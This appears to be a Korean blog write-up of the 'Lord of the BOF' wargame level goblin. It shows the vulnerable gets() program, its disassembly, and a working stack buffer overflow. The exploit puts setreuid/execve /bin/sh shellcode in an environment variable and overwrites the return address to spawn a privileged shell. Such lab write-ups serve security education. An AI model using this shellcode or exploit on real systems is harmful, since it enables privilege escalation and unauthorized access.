[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer); //이전 문제와 차이가 있다면 stdin을 이용하여 값을 넘긴다는 점이다. 역시 문자열길이를 체크하지 않음.
printf("%s\n", buffer);
}
[cobolt@localhost cobolt]$ gdb goblin
(gdb) set disassembly-set intel
No symbol "disassembly" in current context.
(gdb) disas main
Dump of assembler code for function main:
0x80483f8 <main>: push %ebp
0x80483f9 <main+1>: mov %esp,%ebp
0x80483fb <main+3>: sub $0x10,%esp //버퍼의 크기 0x10(16bytes)
0x80483fe <main+6>: lea 0xfffffff0(%ebp),%eax
0x8048401 <main+9>: push %eax
0x8048402 <main+10>: call 0x804830c <gets>
0x8048407 <main+15>: add $0x4,%esp
0x804840a <main+18>: lea 0xfffffff0(%ebp),%eax
0x804840d <main+21>: push %eax
0x804840e <main+22>: push $0x8048470
0x8048413 <main+27>: call 0x804833c <printf>
0x8048418 <main+32>: add $0x8,%esp
0x804841b <main+35>: leave
0x804841c <main+36>: ret
0x804841d <main+37>: nop
0x804841e <main+38>: nop
0x804841f <main+39>: nop
환경변수를 이용하여 쉘코드를 설정해주고...
[cobolt@localhost /tmp]$ export shellcode=`python -c 'print "\x90"*100+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
시작 주소를 구해준다. (myenv 코드는 이전 게시물에 있다.)
[cobolt@localhost /tmp]$ ./myenv shellcode
shellcode is at 0xbffffcbd
<<낮은주소---버퍼(16)+sfp(4)+ret(4)----높은주소>>
[cobolt@localhost cobolt]$ (python -c 'print "\x90"*20+"\xbd\xfc\xff\xbf"';cat)|./goblin //<-stdin으로 입력받기 때문에 cat 명령어를 이용하여 값을 넘겨준다.
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
my-pass
euid = 503
hackers proof
'System Hacking > Lord of Buffer overflow' 카테고리의 다른 글
| 06.lob wolfman->darkelf (0) | 2018.01.08 |
|---|---|
| 05.lob orc->wolfman (0) | 2018.01.07 |
| 04.lob goblin->orc (0) | 2018.01.06 |
| 02.lob gremlin->cobolt (0) | 2018.01.05 |
| 01.lob gate->gremlin (0) | 2018.01.04 |